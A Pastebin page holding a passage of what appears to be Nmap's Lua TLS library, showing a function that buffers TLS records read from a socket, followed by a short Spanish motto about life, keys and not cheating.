  1161. -- @param buffer The string buffer holding any previously-read data
  1162. -- (default: "")
  1163. -- @param i The position in the buffer where the record should start
  1164. -- (default: 1)
  1165. -- @return status Socket status
  1166. -- @return Buffer containing at least 1 record if status is true
  1167. -- @return Error text if there was an error
  1168. function record_buffer(sock, buffer, i)
  1169. buffer = buffer or ""
  1170. i = i or 1
  1171. local count = #buffer:sub(i)
  1172. local status, resp, rem
  1173. if count < TLS_RECORD_HEADER_LENGTH then
  1174. status, resp, rem = read_atleast(sock, TLS_RECORD_HEADER_LENGTH - count)
  1175. if not status then
  1176. return false, buffer .. rem, resp
  1177. end
  1178. buffer = buffer .. resp
  1179. count = count + #resp
  1180. end
  1181. -- ContentType, ProtocolVersion, length
  1182. local _, _, _, len = bin.unpack(">CSS", buffer, i)
  1183. if count < TLS_RECORD_HEADER_LENGTH + len then
  1184. status, resp = read_atleast(sock, TLS_RECORD_HEADER_LENGTH + len - count)
  1185. if not status then
  1186. return false, buffer, resp
  1187. end
  1188. buffer = buffer .. resp
  1189. end
  1190. return true, buffer
  1191. end
  1192.  
  1193. return _ENV;
  1194. =============================================================================
  1195. La vida es un juego no ahi ganadores ni perdedores ni empatados
  1196. las llaves son la gente ke tu conoces, la gente cercana a ti y tu familia.
  1197. si decides usar las llaves correctamente para abrir las puertas tendras un exito
  1198. pero si decides hacer trampa, esas llaves se caeran en el olvido y no abra un volver jamas
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!